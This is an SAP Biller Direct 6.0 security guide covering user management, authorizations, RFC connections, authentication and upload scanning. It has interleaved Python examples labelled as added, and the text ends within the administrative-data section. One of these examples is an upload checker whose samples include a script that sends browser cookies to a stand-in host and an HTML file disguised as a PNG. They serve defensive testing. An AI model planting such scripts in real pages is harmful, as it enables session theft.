Biller Direct Security


Page 1: Biller Direct Security

SAP Biller Direct Security Guide

Release 6.0


August 2005

SAP Biller Direct Security Guide 2

Copyright © Copyright 2004 SAP AG. All rights reserved. No part of this publication may be reproduced or transmitted in any form or for any purpose without the express permission of SAP AG. The information contained herein may be changed without prior notice. Some software products marketed by SAP AG and its distributors contain proprietary software components of other software vendors. Microsoft, Windows, Outlook, and PowerPoint are registered trademarks of Microsoft Corporation. IBM, DB2, DB2 Universal Database, OS/2, Parallel Sysplex, MVS/ESA, AIX, S/390, AS/400, OS/390, OS/400, iSeries, pSeries, xSeries, zSeries, z/OS, AFP, Intelligent Miner, WebSphere, Netfinity, Tivoli, and Informix are trademarks or registered trademarks of IBM Corporation in the United States and/or other countries. Oracle is a registered trademark of Oracle Corporation. UNIX, X/Open, OSF/1, and Motif are registered trademarks of the Open Group. Citrix, ICA, Program Neighborhood, MetaFrame, WinFrame, VideoFrame, and MultiWin are trademarks or registered trademarks of Citrix Systems, Inc. HTML, XML, XHTML and W3C are trademarks or registered trademarks of W3C®, World Wide Web Consortium, Massachusetts Institute of Technology. Java is a registered trademark of Sun Microsystems, Inc. JavaScript is a registered trademark of Sun Microsystems, Inc., used under license for technology invented and implemented by Netscape. MaxDB is a trademark of MySQL AB, Sweden. SAP, R/3, mySAP, mySAP.com, xApps, xApp, SAP NetWeaver, and other SAP products and services mentioned herein as well as their respective logos are trademarks or registered trademarks of SAP AG in Germany and in several other countries all over the world. All other product and service names mentioned are the trademarks of their respective companies. Data contained in this document serves informational purposes only. National product specifications may vary. These materials are subject to change without notice. 
These materials are provided by SAP AG and its affiliated companies ("SAP Group") for informational purposes only, without representation or warranty of any kind, and SAP Group shall not be liable for errors or omissions with respect to the materials. The only warranties for SAP Group products and services are those that are set forth in the express warranty statements accompanying such products and services, if any. Nothing herein should be construed as constituting an additional warranty.


Icons in Body Text

The following icons are used in the body text:

• Caution

• Example

• Note

• Recommendation

• Syntax

Additional icons are used in SAP Library documentation to help you identify different types of information at a glance. For more information, see Help on Help → General Information Classes and Information Classes for Business Information Warehouse on the first page of any version of SAP Library.

Typographic Conventions

• Example text (quoted from the screen): Words or characters quoted from the screen. These include field names, screen titles, pushbutton labels, menu names, menu paths, and menu options. The same style is used for cross-references to other documentation.

• Example text (emphasis): Emphasized words or phrases in body text, graphic titles, and table titles.

• EXAMPLE TEXT (technical names): Technical names of system objects. These include report names, program names, transaction codes, table names, and key concepts of a programming language when they are surrounded by body text, for example, SELECT and INCLUDE.

• Example text (screen output): Output on the screen. This includes file and directory names and their paths, messages, names of variables and parameters, source text, and names of installation, upgrade and database tools.

• Example text (exact user entry): Words or characters that you enter in the system exactly as they appear in the documentation.

• <Example text> (variable user entry): Angle brackets indicate that you replace these words and characters with appropriate entries to make entries in the system.

• EXAMPLE TEXT (keys): Keys on the keyboard, for example, F2 or ENTER.


SAP Biller Direct Security Guide ... 5
  Security of SAP Biller Direct ... 5
  Architecture of SAP Biller Direct ... 6
  User Management and Authentication ... 7
    User Management and Authorizations ... 8
      Authorization Objects and Example Roles ... 10
    User Management Data in Customizing for the Web Application ... 12
    Connection Between the Web Application and the Accounting System ... 13
    Authentication of the Web User ... 14
  Data Storage Security (Data Protection) ... 14
    Document Upload and SAP Virus Scan Interface ... 14
    User Data ... 15
    Editing Administrative Data ... 15
    Logging the Activities of the User ... 16
  Communication ... 17
    HTTP and SSL ... 17
    Configuring SNC for SAP Biller Direct ... 18
  Secure Installation and Configuration ... 19
    Secure Configuration of the J2EE Engine ... 19
    Password ... 19
    Configuring Extended Configuration Management (XCM) Securely ... 19
      XCM Application Configuration Data ... 21
      Protection with the Basic Authentication of the Servlet Engine ... 22
    Reducing the Risk of Cross-Site Scripting Attacks ... 23
    Secure Configuration of the Call Center Mode ... 24
    Hiding Scenarios ... 25
    Transfer of Request Parameters ... 25


SAP Biller Direct Security Guide

Security of SAP Biller Direct

Introduction

This guide discusses the aspects of SAP Biller Direct that affect data security and describes the measures required to operate SAP Biller Direct securely. It occasionally refers to other guides that cover in detail topics that cannot be discussed in depth here; where to find those documents is listed below.

SAP Biller Direct is a Java-based Web application that presents customer accounts in a biller's Internet portal. It enables customers to pay bills over the Internet and to enter inquiries and complaints. The biller deploys the SAP Biller Direct Web application and runs subledger accounting either in Accounts Receivable Accounting (FI-AR) or in Contract Accounts Receivable and Payable (FI-CA).

First read the SAP Web Application Server Security Guide (SAP WAS Security Guide), which describes the basic security aspects and measures for SAP systems.

You should also consult SAP Note 715371 (SAP J2EE – Composite SAP Note on Security Basis 6.30/6.40).

Before working with the source code delivered with SAP Biller Direct 6.0, read SAP Note 858563.

Further Information

You can find the following documents on the SAP Biller Direct software CD or in the SAP Service Marketplace:

• SAP WAS Security Guide under service.sap.com/securityguide

• SNC User’s Guide or Cookbook: Configuring SNC for the AGate / SAP System Connect under service.sap.com/security and then Security in Detail → Secure System Management

• J2EE Security Guide under service.sap.com/securityguide

• Master Guide mySAP Financials under service.sap.com/ibc

• Installation Guide SAP Biller Direct 6.0 under service.sap.com/ibc

• Configuration Guide SAP Biller Direct 6.0 for Accounts Receivable Accounting (FI-AR) under service.sap.com/ibc

• Modification Guide SAP Biller Direct 6.0 for Accounts Receivable Accounting (FI-AR) under service.sap.com/ibc

• Configuration Guide SAP Biller Direct 6.0 for Contract Accounts Receivable and Payable (FI-CA) under service.sap.com/ibc

• Modification Guide SAP Biller Direct 6.0 for Contract Accounts Receivable and Payable (FI-CA) under service.sap.com/ibc

For additional current information on the secure configuration of SAP Biller Direct, see SAP Note 849511.


Architecture of SAP Biller Direct

Use

The following outline describes the processes involved in operating the SAP Biller Direct application and the requirements that must be met.

Prerequisites

You use Accounts Receivable Accounting (FI-AR) or Contract Accounts Receivable and Payable (FI-CA) for your subledger accounting.

Process

The Web application runs on a Web server and is the front end of SAP Biller Direct. It presents the accounting data on the Internet and handles the communication between the front end and the back end. The Web application consists of JavaServer Pages and servlets.

The accounting system runs on a standard SAP application server and is the back end of SAP Biller Direct. Data is transferred between the front end and the back end by Remote Function Call (RFC); the RFC calls are made through the SAP Java Connector (JCo), which you install as part of the SAP middleware.

To extend the Java 2 Standard Edition (J2SE) and to develop and operate company-specific applications, you need the SAP J2EE Engine (SAP Java 2 Enterprise Edition Engine). With the Engine, SAP provides a complete application server that conforms to the J2EE Specification 1.2.

The following figure shows the architecture of SAP Biller Direct.

[Figure: Architecture of SAP Biller Direct. Four network zones separated by firewalls: Internet, Outer DMZ, Inner DMZ, Security Area. Components: the browser; a Web server; the SAP Web Application Server running the SAP Biller Direct front end (Java), UME (Java), and JCo; the SAP Business Connector; and the SAP application server with the SAP back end (FI-AR/FI-CA), the archive, and the billing application (for example SD or CRM Billing). Connections: HTTPS from the browser via the Web server to the front end (display of open items, bill details); HTTP between the SAP Business Connector and the front end; RFC between the front end and the back-end systems.]

For additional information on the architecture of a system landscape in an Internet scenario and the placement of firewalls, see the Security Guide for the J2EE Engine in the SAP Service Marketplace under service.sap.com/securityguides → SAP NetWeaver 04 Network Security Guides → Network Security for the SAP J2EE Engine → Using Multiple Network Zones.


Secure Network Communications (SNC)

To secure the transfer of data between the Web application and the SAP system, use Secure Network Communications (SNC). For detailed information on using SNC, see the SAP Service Marketplace under service.sap.com/security, in the navigation bar on the right of the screen under Security in Detail → Secure System Management:

• SNC User's Guide

• Cookbook: Configuring SNC for the AGate/SAP System Connect

Recommendations

• For additional information on the secure architecture of the J2EE Engine (placement of firewalls), see the Security Guide for the J2EE Engine.

• Configure the JCo RFC server only with SNC. Otherwise it is possible for further users to be created through requests sent to the SAP system gateway (possibly with other users as reference users).

• The SAP Business Connector communicates with the SAP J2EE Engine via HTTP. Install the SAP Business Connector and the J2EE Engine on the same computer and bind the connection to the local host as described below, so that this HTTP traffic never leaves the machine.

In Extended Configuration Management (XCM), where you configure the SAP Biller Direct Web application for its connection to the SAP Business Connector, make the following entries:

¡ Host: 127.0.0.1 (localhost)

¡ Port: the port on which the SAP Business Connector listens

In the SAP Business Connector Administrator, restrict this port so that it can only be called from the same computer:

i. Under Security → Ports, edit the IP Access for the port.

ii. Choose Edit → Change IP Access Mode and set the mode to Deny by Default.

iii. Delete the proposed IPs from the list, choose Add Host to Allow List, and enter 127.0.0.1.

For additional information on configuring the SAP Biller Direct Web application with XCM, see the Configuration Guide for SAP Biller Direct under Business Customizing → Configuring the Web Application with the XCM.

You can find additional information on SAP Business Connector security in the Security Guide for the SAP Business Connector.

User Management and Authentication

Use

Use the SAP User Management Engine (UME) to manage the Web users who log on through the Web front end.

Further Information You can find additional information on the UME in the SAP Help Portal under the Internet address help.sap.com under SAP NetWeaver → SAP Web Application Server. Having selected the relevant release and language, choose Administration Guide → Portal → System Administration → User Management Configuration.

For more information on user management, see the Configuration Guide for SAP Biller Direct under User Management.


User Management and Authorizations

Features

SAP Biller Direct has the following types of users:

• Web user

User who logs on in the Web browser and carries out activities there such as paying bills. You do not assign separate roles or authorization profiles to the Web user.

• Reference user

A user in the SAP system that is assigned to the Web user and that carries the authorizations and roles the Web user needs in the SAP system. Reference users are always created with transaction SU01 in the SAP back end and have the user type Reference User. If you maintain Web users outside the SAP back-end system, bear in mind that reference users do not carry the pool user's authorizations, but only the authorizations for functions in the front end. This concerns only authorizations for authorization object F_ACT_EBPP (if you use FI-AR) or authorization object F_KK_EBPP (if you use FI-CA).

• Pool user

The technical user under which the data transfer between the Web application and the SAP system takes place. You maintain the pool user data in Extended Configuration Management (XCM).

¡ If you manage user data in the SAP system, the pool user is used for read access to the accounting data in the SAP system. (Prerequisite: the parameter use_named_connections in XCM has the value yes.)

¡ If you manage user data outside the SAP system in which the accounting runs, using a Lightweight Directory Access Protocol (LDAP) server or a separate CRM system (if you use mySAP Customer Relationship Management), the pool user is used for read and write access to the SAP system in which the accounting data is stored. (Prerequisite: the parameter use_named_connections in XCM has the value no.)

User Management in the SAP System

To manage Web users who display and pay their bills using SAP Biller Direct, you have to make certain settings in the master data. You create the following types of master records for this:

• One user master record for each Web user

You assign a customer or business partner to this.

• Multiple reference user master records

For each authorization profile you need, you create a reference user master record and assign it an authorization profile. SAP delivers example roles that contain the necessary authorizations. For more information, see the Configuration Guides for SAP Biller Direct in the section User Management.

• One pool user master record

In this scenario, one user exists in the SAP system for each Web user. Write accesses are made under this user, so it is recorded in the change documents and you can trace changes back to the individual Web user. (Prerequisite: the parameter use_named_connections in XCM has the value yes.)


User Management Outside the SAP System

If you manage users outside the SAP system in which the accounting is found, create the following types of users in the SAP system where the accounting is also found:

• A reference user master record for each authorization profile

• A pool user master record

Since this pool user is the one recorded in the change documents, you cannot trace changes back to individual Web users from the change documents. To do so, use the log function; see the section Logging the Activities of the User.

Recommendation

• Assign authorizations exclusively to the reference user master records, not directly to the user master records of the individual Web users.

• Copy the example roles that are delivered, check which authorizations are relevant to you, and adapt the copied roles. Proposed values that depend on the settings you define in Customizing are not delivered in the standard system; you need to add these yourself.

• Give the pool user only the authorizations it really needs.

• The pool user must not have a trivial password. Assign a password of sufficient length that contains both letters and numbers.

• Create Web users and pool users as communication users (user type Communication), which cannot log on in dialog.

• Do not allow Web users direct access to the SAP system through RFC.

• If you manage user data outside the SAP system (for example, with an LDAP server), use the log function to trace and analyze the activities of individual Web users.

• The function modules in the following function groups access sensitive data. Consequently, grant authorization to call them only to the users through which SAP Biller Direct logs on from the Internet:

¡ APAR_EBPP

¡ GEN_EBPP

¡ APAR_EBPP_CARDS

• Users who have the value ADM1 for authorization object F_ACT_EBPP or F_KK_EBPP can update the configuration of the SAP Biller Direct Web application on the J2EE Engine by calling a URL. Do not grant this authorization to Web users.

Further Information

Additional information on user management, authorizations, and roles can be found in the Configuration Guide for SAP Biller Direct under User Management and under Business Customizing → Configuring the Web Application with XCM.


Authorization Objects and Example Roles

Authorization checks are made both in the SAP system and in the J2EE Engine. Only the authorizations for authorization object F_ACT_EBPP (F_KK_EBPP in FI-CA) are checked in the J2EE Engine; the remaining authorization objects listed below are checked in the SAP system. Authorization object F_ACT_EBPP (F_KK_EBPP) controls the authorizations specific to SAP Biller Direct. The Web user's authorizations for this object are downloaded from the SAP system after successful authentication and checked on the J2EE Engine before each of the Web user's activities.
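The two-tier check just described, together with the recommendations in the previous section (authorizations only via reference users, no ADM1 for Web users, communication user type), as an added example in Python; this is not code from this guide or from SAP Biller Direct. It resolves a Web user's effective F_ACT_EBPP authorizations through the assigned reference user the way the SAP system does, holds them in a front-end session object the way the J2EE Engine does after logon, checks an activity against them, and audits a constructed set of user master records against the recommendations. The user IDs, role names, user-type labels and the activity codes other than ADM1 are assumptions.

```python
"""Effective SAP Biller Direct authorizations via reference users.

Added example, not code from the guide or from SAP Biller Direct. It models
what the guide describes: a Web user's F_ACT_EBPP (FI-CA: F_KK_EBPP)
authorizations are resolved in the SAP system through the assigned reference
user, handed to the J2EE Engine after logon, and checked there before each
activity. User IDs, role names, user-type labels and the activity codes other
than ADM1 are assumptions; the real values are in the delivered roles.
"""
from dataclasses import dataclass, field
from typing import Dict, FrozenSet, List, Set

OBJECT = "F_ACT_EBPP"        # FI-AR; F_KK_EBPP plays the same part for FI-CA
ADMIN_ACTIVITY = "ADM1"      # lets the holder update the Web application configuration by URL


@dataclass
class Role:
    name: str
    authorizations: Dict[str, Set[str]]   # authorization object -> allowed activity values


@dataclass
class SapUser:
    name: str
    user_type: str                         # "DIALOG", "COMMUNICATION", "REFERENCE", ...
    roles: List[Role] = field(default_factory=list)
    reference_user: "SapUser | None" = None


def effective_activities(user: SapUser, obj: str = OBJECT) -> FrozenSet[str]:
    """Union of the user's own role authorizations and those inherited from its reference user."""
    acts: Set[str] = set()
    for role in user.roles:
        acts |= role.authorizations.get(obj, set())
    if user.reference_user is not None:
        acts |= effective_activities(user.reference_user, obj)
    return frozenset(acts)


class FrontEndSession:
    """What the J2EE Engine holds after successful authentication: the downloaded activity set."""

    def __init__(self, user: SapUser):
        self.web_user = user.name
        self._activities = effective_activities(user)   # downloaded once after logon

    def check(self, activity: str) -> bool:
        """Checked before every Web-user activity on the J2EE Engine."""
        return activity in self._activities


def audit(web_users: List[SapUser]) -> List[str]:
    """Findings against the guide's recommendations for Web users."""
    findings = []
    for u in web_users:
        if any(OBJECT in r.authorizations for r in u.roles):
            findings.append(f"{u.name}: {OBJECT} assigned directly instead of via the reference user")
        if u.reference_user is None:
            findings.append(f"{u.name}: no reference user, so no front-end authorizations")
        elif u.reference_user.user_type != "REFERENCE":
            findings.append(f"{u.name}: assigned reference user {u.reference_user.name} is not of type REFERENCE")
        if ADMIN_ACTIVITY in effective_activities(u):
            findings.append(f"{u.name}: holds {ADMIN_ACTIVITY} and could change the Web application configuration")
        if u.user_type != "COMMUNICATION":
            findings.append(f"{u.name}: user type {u.user_type}, should be COMMUNICATION")
    return findings


# Constructed master data (assumed names and activity codes; "ADM1" is from the guide).
PAY_ONLY = Role("Z_BD_PAY", {OBJECT: {"DISP", "PAY"}})
ADMIN = Role("Z_BD_ADMIN", {OBJECT: {"DISP", "PAY", ADMIN_ACTIVITY}})
REF_CUSTOMER = SapUser("BD_REF_CUST", "REFERENCE", roles=[PAY_ONLY])
REF_ADMIN = SapUser("BD_REF_ADM", "REFERENCE", roles=[ADMIN])
WEB_USERS = [
    SapUser("WEBUSER01", "COMMUNICATION", reference_user=REF_CUSTOMER),
    SapUser("WEBUSER02", "COMMUNICATION", roles=[PAY_ONLY], reference_user=REF_CUSTOMER),
    SapUser("WEBUSER03", "DIALOG", reference_user=REF_ADMIN),
]


def demo() -> dict:
    """Check one activity for a clean user and audit all constructed Web users."""
    s = FrontEndSession(WEB_USERS[0])
    return {
        "webuser01_can_pay": s.check("PAY"),
        "webuser01_can_admin": s.check(ADMIN_ACTIVITY),
        "findings": audit(WEB_USERS),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(key, value)
```

WEBUSER01 produces no findings; WEBUSER02 is flagged for a directly assigned role, and WEBUSER03 both for inheriting ADM1 and for being a dialog user. The same resolution would apply to F_KK_EBPP by changing OBJECT.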

Accounts Receivable Accounting (FI-AR):

All special functions for SAP Biller Direct are protected by authorization object F_ACT_EBPP.

In addition, the Web user authorizations are checked for the following authorization objects in the SAP system:

Object class AAAB:

• B_NOTIF

• S_RFC

Object class BC_A:

• S_SPO_DEV

• S_TABU_DIS

• S_USER_GRP

Object class BC_Z:

• S_BDS_DS

• S_OC_DOC

• S_OC_ROLE

• S_OC_SEND

Object class FI:

• F_ACT_EBPP

• F_BKPF_BUK

• F_BKPF_KOA

• F_KNA1_APP

• F_KNA1_BUK

• F_KNA1_GEN

• F_KNA1_GRP

• F_WEB_EBPP

Object class PM:

• I_QMEL

Object class SD:

• V_VBRK_FKA

• V_VBRK_VKO

You can assign roles with the appropriate authorizations or partial authorizations to the Web users. SAP delivers example roles that summarize the necessary authorizations. As these roles have generic authorizations, you have to copy them and adapt them to your requirements.

• SAP_FI_FSCM_BD_POOLUSER Contains all of the required authorizations for the pool user, if the user is only to have read access to the back end. In this case, you have to use named connections for the changing (write) accesses to the SAP system.

• SAP_FSCM_BD_AR_POOL_RW Contains all of the required authorizations for the pool user, if the user is to execute read and write access to the back end. You use this role when you do not have named connections.

• SAP_FI_FSCM_ALL Contains all of the authorizations that a user of SAP Biller Direct requires. Note that you must enter values for this role if the user is to be able to carry out functions such as partial payments or address changes.

You can find more example roles with transaction PFCG using the input help and search template *FSCM*.

Contract Accounts Receivable and Payable (FI-CA):

All special functions for SAP Biller Direct are protected in FI-CA by authorization object F_KK_EBPP. In addition, the Web user authorizations are checked for the following authorization objects in the SAP system:

Object class AAAB:

• B_ALE_MODL

• B_BUPA_FDG

• B_BUPA_RLT

• B_CCARD

• B_NOTIF

• S_RFC

Object class BPCT:

• B_PCONTACT

Object class FI:

• F_KKKO_BEG

• F_KKKO_BUK

• F_KKVK_BEG

• F_KKVK_BUK

• F_KKVK_VKT

• F_KK_AVIS

• F_KK_EBPP

Object class PM:

• I_QMEL

Object class BC_Z:

• S_BDS_DS

You can assign roles with the appropriate authorizations or partial authorizations to the Web users. SAP delivers example roles that summarize the necessary authorizations. As these roles have generic authorizations, you have to copy them and adapt them to your requirements.

• SAP_FI_FSCM_BD_POOL Contains all of the authorizations the pool user requires, if the user is only to have read access to the back end. In this case, you have to use named connections for the changing accesses to the SAP system.

• SAP_FSCM_BD_CA_POOL_RW Contains all of the required authorizations for the pool user, if the user is to execute read and write access to the back end. You use this role when you do not have named connections.

• SAP_FI_FSCM_ALL_BD Contains all of the authorizations that a user of SAP Biller Direct requires. Note that you must enter values for this role if the user is to be able to carry out functions such as partial payments or address changes.

You can find more example roles with transaction PFCG using the input help and search template *FSCM*. Proposed values that are dependent on the settings you have defined in Customizing are not delivered in the standard system. You need to adapt these as appropriate.

User Management Data in Customizing for the Web Application

Use

User management covers the following SAP Biller Direct functions:

• Authentication of Web users

• Access to the assignment of the user to the business partner or customer in the back end or in the SAP User Management Engine (UME)

• Determination of the reference user for the user in the back end; the reference user passes its authorizations on to the user

You can manage the Web users either in FI-AR or in an external SAP system, such as CRM Internet Sales, or with the User Management Engine (for LDAP). You control the relationship between the Web application (front end) and the accounting system (back end) using the parameters of the component UserManagement of Extended Configuration Management (XCM). SAP delivers the following preconfigured scenarios:

• CRM_UserManagement

• FI_UserManagement

• UME_UserManagement

Prerequisites

You have created the user master data in FI-AR, in an external SAP system, or in the SAP User Management Engine.

Further Information

See the Configuration Guide for SAP Biller Direct under User Management and under Business Customizing → Configuring the Web Application with the XCM.


Connection Between the Web Application and the Accounting System

Prerequisites

• You have created a pool user in the SAP system.

• You have entered one or more connection pools (one pool for each language required) in Extended Configuration Management (XCM). In the Web application, texts that are read from the SAP system (for example, bill texts) are also presented. You can create a connection pool for each language in which a Web user logs on. If there is no connection pool for the language in which the Web user logs on, the default pool is used.

Features

The Web application and the accounting system (FI-CA or FI-AR) are connected via the SAP communication protocol Remote Function Call (RFC) using the SAP Java Connector (JCo). The following two connection types are used:

• Pooled connections

An RFC connection to the application server is not closed as soon as a user logs off and no longer needs it; it is kept in a pool of open RFC connections and reused for the next access. Pooled connections are shared by all users who are logged on at the same time. Consequently, Web users do not work under their own user but under the pool user.

Information on authorization checks is contained in the Configuration Guide for SAP Biller Direct.

If you manage your user data outside the SAP system in which your accounting runs (for example, with an LDAP server), both read and write accesses are made using pooled connections. If you manage the user data within the SAP system in which your accounting runs, only read accesses are made using pooled connections. (Prerequisite: the parameter use_named_connections in Extended Configuration Management (XCM) has the value yes.)

• Named connections

In this case access is made using an RFC connection under the user logged on (Named Connection). This named connection creates a separate RFC connection for each Web user; this connection only exists while the Web user is executing a process (for example, paying a bill). Afterwards the link is disconnected. This ensures that:

¡ All authorization checks are made for the user logged on

¡ All change documents for the user logged on are saved

¡ All user-specific system parameters access the values of the user logged on

If you administer the user data within the SAP system in which your accounting is found, writing accesses are made using named connections. (Prerequisite: the parameter use_named_connections in Extended Configuration Management (XCM) has the value yes.)
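The traceability consequence of use_named_connections, as an added example in Python (not code from this guide or from SAP Biller Direct): a model in which read accesses always use the pooled connection under the pool user, write accesses use a named connection under the Web user only when use_named_connections is yes, the accounting back end records the executing SAP user in its change document, and the front end's own activity log, standing in for the log function the guide recommends when user data is kept outside the SAP system, resolves a pool-user change document back to the Web user. Class names, user IDs and the sequence-number correlation are assumptions.

```python
"""Model of pooled versus named RFC connections in SAP Biller Direct.

Added example, not code from the guide or from SAP Biller Direct. Class
names, user IDs and the log format are assumptions; the behaviour follows
the guide: reads always use the pooled connection under the pool user,
writes use a named connection under the Web user only when
use_named_connections is "yes", and the back end records the executing
SAP user in its change documents.
"""
from dataclasses import dataclass, field
from itertools import count


@dataclass(frozen=True)
class ChangeDocument:
    """What the accounting system records for a write access."""
    seq: int
    object_id: str
    action: str
    changed_by: str       # SAP user of the RFC connection, not necessarily the Web user


@dataclass
class AccountingBackend:
    change_documents: list = field(default_factory=list)
    _seq: count = field(default_factory=lambda: count(1))

    def call(self, sap_user: str, action: str, object_id: str, write: bool) -> int:
        """Execute an RFC call under sap_user; a write produces a change document."""
        seq = next(self._seq)
        if write:
            self.change_documents.append(ChangeDocument(seq, object_id, action, sap_user))
        return seq


@dataclass
class WebApplication:
    """Front end: chooses the connection type and keeps its own activity log."""
    backend: AccountingBackend
    pool_user: str
    use_named_connections: bool
    activity_log: list = field(default_factory=list)   # (seq, web_user, action, object_id)
    open_named_connections: int = 0

    def execute(self, web_user: str, action: str, object_id: str, write: bool) -> str:
        """Run one Web-user activity and return the SAP user it executed under."""
        if write and self.use_named_connections:
            # Named connection: opened for this process only, under the Web user,
            # so authorization checks and change documents refer to the Web user.
            self.open_named_connections += 1
            try:
                sap_user = web_user
                seq = self.backend.call(sap_user, action, object_id, write=True)
            finally:
                self.open_named_connections -= 1   # disconnected when the process ends
        else:
            # Pooled connection shared by all logged-on users: runs as the pool user.
            sap_user = self.pool_user
            seq = self.backend.call(sap_user, action, object_id, write)
        # The front-end log always knows the real Web user; this stands in for the
        # guide's "log function" when user data lives outside the SAP system.
        self.activity_log.append((seq, web_user, action, object_id))
        return sap_user


def trace_change(app: WebApplication, doc: ChangeDocument) -> str:
    """Resolve a change document to the Web user who caused it.

    Direct when the document names a real Web user; via the activity log
    (matched on the back-end call sequence number) when it names the pool user.
    """
    if doc.changed_by != app.pool_user:
        return doc.changed_by
    for seq, web_user, _action, _object_id in app.activity_log:
        if seq == doc.seq:
            return web_user
    raise LookupError(f"no log entry for change document {doc.seq}")


def run_scenario(use_named_connections: bool) -> dict:
    """One Web user reads open items, then pays a bill; report who the back end saw."""
    app = WebApplication(AccountingBackend(), pool_user="BD_POOL",
                         use_named_connections=use_named_connections)
    read_as = app.execute("WEBUSER01", "DISPLAY_OPEN_ITEMS", "CUST-4711", write=False)
    write_as = app.execute("WEBUSER01", "PAY_BILL", "DOC-9000001", write=True)
    doc = app.backend.change_documents[-1]
    return {
        "read_as": read_as,
        "write_as": write_as,
        "change_document_user": doc.changed_by,
        "traced_to": trace_change(app, doc),
        "named_connections_left_open": app.open_named_connections,
    }


if __name__ == "__main__":
    for flag in (True, False):
        print(f"use_named_connections={'yes' if flag else 'no'}: {run_scenario(flag)}")
```

With named connections the change document itself names WEBUSER01; without them it names BD_POOL, and only the front-end log can attribute the payment to the Web user, which is why the guide insists on the log function in the external user-management case.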


Authentication of the Web User

Use

Every Web user who displays and pays bills using SAP Biller Direct must be authenticated.

Features

1. Authentication for the Web application can be carried out in the following ways:

¡ The Web user enters his or her user name and password. The system then authenticates the user name and password against the user master you have created in FI-CA or FI-AR.

¡ A Single Sign-On ticket (SAP SSO2 ticket) is transferred. If a Web user has already logged on to a portal and calls up SAP Biller Direct from this portal, they do not have to log on again, provided the portal supports SAP SSO2 tickets. The portal system (for example, SAP Workplace) has already authenticated the Web user and issues a digitally signed SAP logon ticket that carries the user ID; the SAP User Management Engine (UME) verifies the ticket signature against the issuing system's X.509 certificate and, if it is valid, grants the Web user access to SAP Biller Direct.

2. The business partner or customer that you have assigned in the user master record of a Web user is determined.

Data Storage Security (Data Protection)

Document Upload and SAP Virus Scan Interface

If you use SAP Biller Direct integrated with SAP Dispute Management and use the upload function in SAP Dispute Management, SAP strongly advises you to connect a suitable virus scanner via the Virus Scan Interface (VSI), since SAP Biller Direct itself does not scan for viruses. This interface is integrated in the upload function for documents. For additional information on this interface, see SAP Note 786179.

Note also that SAP Biller Direct does not perform the following checks:

• MIME type validation: The system takes the MIME type of a document that is appended to a dispute case from the HTTP request and compares it with the permitted MIME types. SAP Biller Direct does not check whether this declared MIME type matches the actual content of the document. This check must be made in the scanner connected via the VSI, so as to prevent MIME type spoofing.

• Scripting in uploaded HTML files: SAP Biller Direct does not itself check uploaded files for scripts. This check must also be made in the scanner connected via the VSI. Otherwise HTML files containing JavaScript sections can be uploaded, and the script is executed when the file is displayed in a browser.

Make sure that these functions are also covered by the VSI.
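The two checks the guide says must happen behind the VSI, as an added example in Python (not code from this guide, from SAP Biller Direct, or the VSI API itself): a content check that compares the MIME type declared in the request with what the bytes actually are, and a scan of HTML uploads for script that would run on display. The allow-list of permitted types, the detection patterns and the sample documents are constructed for illustration.

```python
"""Content checks that SAP Biller Direct leaves to the scanner behind the VSI.

Added example, not code from the guide or from SAP Biller Direct, and not the
VSI API itself: it shows the two checks the guide says the front end does not
perform, as a scanner plugged in behind the interface would have to make them.
The permitted-type list, detection patterns and sample documents are assumptions.
"""
import re
from typing import Optional, Tuple

# Permitted MIME types and the leading bytes a document of that type must start with.
# Assumed allow-list; the real permitted types are configured in SAP Dispute Management.
MAGIC = {
    "application/pdf": [b"%PDF-"],
    "image/png": [b"\x89PNG\r\n\x1a\n"],
    "image/jpeg": [b"\xff\xd8\xff"],
    "text/html": [],          # no magic; identified by the tag check below
}

_HTML_TAG = re.compile(rb"<\s*(html|!doctype\s+html|body|script)\b", re.IGNORECASE)
_SCRIPT_MARKERS = re.compile(
    rb"<\s*script\b"                       # inline script element
    rb"|\bon[a-z]+\s*=\s*['\"]?"            # event handler attribute, e.g. onload=
    rb"|javascript\s*:"                    # javascript: URL
    rb"|<\s*(iframe|object|embed)\b",      # embedded active content
    re.IGNORECASE,
)


def sniff_type(data: bytes) -> Optional[str]:
    """Return the MIME type implied by the content itself, or None if unknown."""
    for mime, magics in MAGIC.items():
        if any(data.startswith(m) for m in magics):
            return mime
    if _HTML_TAG.search(data[:1024]):
        return "text/html"
    return None


def contains_script(data: bytes) -> bool:
    """True if an HTML document carries script that would run when displayed."""
    return _SCRIPT_MARKERS.search(data) is not None


def check_upload(declared_mime: str, data: bytes) -> Tuple[bool, str]:
    """Decide whether an upload may be attached; returns (accepted, reason)."""
    declared = declared_mime.split(";")[0].strip().lower()
    if declared not in MAGIC:
        return False, f"type {declared} not permitted"
    actual = sniff_type(data)
    if actual != declared:
        # The type taken from the HTTP request does not match the bytes:
        # the MIME type spoofing case the guide warns about.
        return False, f"declared {declared} but content looks like {actual or 'unknown'}"
    if actual == "text/html" and contains_script(data):
        return False, "HTML contains script"
    return True, "ok"


# Constructed sample uploads (not real documents): (declared MIME type, content).
SAMPLES = {
    "invoice.pdf": ("application/pdf", b"%PDF-1.4\n1 0 obj << /Type /Catalog >> endobj\n%%EOF"),
    "logo.png": ("image/png", b"\x89PNG\r\n\x1a\n\x00\x00\x00\rIHDR"),
    "fake.png": ("image/png", b"<html><body onload=\"alert(1)\">x</body></html>"),
    "note.html": ("text/html", b"<html><body><p>Please call me back.</p></body></html>"),
    "xss.html": ("text/html", b"<html><body><script>document.location='http://evil.invalid/'+document.cookie</script></body></html>"),
    "macro.exe": ("application/x-msdownload", b"MZ\x90\x00"),
}


def scan_samples() -> dict:
    """Run check_upload over every constructed sample."""
    return {name: check_upload(mime, data) for name, (mime, data) in SAMPLES.items()}


if __name__ == "__main__":
    for name, (accepted, reason) in scan_samples().items():
        print(f"{name:12} {'ACCEPT' if accepted else 'REJECT':6} {reason}")
```

fake.png is rejected because the declared image type does not match the HTML inside; xss.html is rejected for its script element even though its declared type is permitted; the plain note.html and the genuine PDF and PNG are accepted.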


User Data

Whenever the Web user uses Web application functions that make changes, for example, when credits are used to offset payments, the system automatically records the user data in the change documents in the SAP system. Since this is personal data, check whether you are legally required to obtain the consent of the Web user before recording his or her data. For example, data protection legislation in Germany permits the storage of personal data only if the user has given express consent. This means that if the Web user does not consent to the recording of his or her data in the accounting system, you must ensure that he or she cannot carry out activities that would lead to a change in data.

Editing Administrative Data

Use

Provided they have the necessary authorization, Web users can:

• Request a user

• Change their address (new address, telephone, fax and e-mail address)

• Create, change or delete bank and credit card data

• Reset the password

• Request notification when a new bill or credit is posted

¡ Specify and change the type of notification (SMS, e-mail)

¡ Enter the address to which the notification should be sent, or else delete it

¡ Specify a notification period

